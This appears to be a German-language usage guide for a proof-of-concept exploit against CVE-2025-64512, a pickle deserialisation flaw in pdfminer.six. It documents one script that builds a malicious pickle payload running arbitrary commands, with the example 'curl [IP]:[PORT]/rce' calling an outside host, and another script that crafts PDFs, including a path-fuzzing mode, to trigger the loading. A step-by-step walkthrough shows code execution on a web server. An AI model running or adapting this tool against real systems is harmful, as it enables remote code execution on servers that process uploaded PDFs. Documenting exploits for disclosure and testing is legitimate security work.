
CVE-2025-64512: pdfminer.six Pickle-Deserialisierung RCE; .pickle.gz + PDF-Generator mit benutzerdefinierten Payloads
% python3 mkpickle.py Usage: mkpickle.py [output] Ex: mkpickle.py 'curl [IP]:[PORT]/rce' evil.pickle.gz
% python3 mkpdf.py -h usage: mkpdf.py [-h] [-o OUTPUT] [-p PATH] [-f] [pickle_name]
Erstellt PDF, das die pickle-Deserialisierung von pdfminer.six auslöst (CVE-2025-64512)
positional arguments: pickle_name Pickle-Dateiname ohne .pickle.gz (Standard: evil)
options: -h, --help Zeigt diese Hilfemeldung an und beendet das Programm -o, --output OUTPUT Ausgabe-PDF-Dateiname (Standard: exploit.pdf) -p, --path PATH Eigener absoluter Pfad zur pickle (ohne .pickle.gz) -f, --fuzz Erzeugt PDFs für alle üblichen absoluten Pfade
python3 mkpickle.py 'touch /tmp/a' evil.pickle.gz [+] evil.pickle.gz (78 bytes) cmd: touch /tmp/a
(lade evil.pickle.gz nach /var/www/html/files/evil.pickle.gz hoch)
python3 mkpdf.py -o ex-poc.pdf -p '/var/www/html/files' evil [+] ex-poc.pdf -> /var/www/html/files/evil.pickle.gz
(lade ex-poc.pdf hoch & warte auf PDF-Verarbeitung / löse sie aus)
ls -l /tmp/a -rw-r--r-- 1 ... ... 0 Jul 19 12:39 a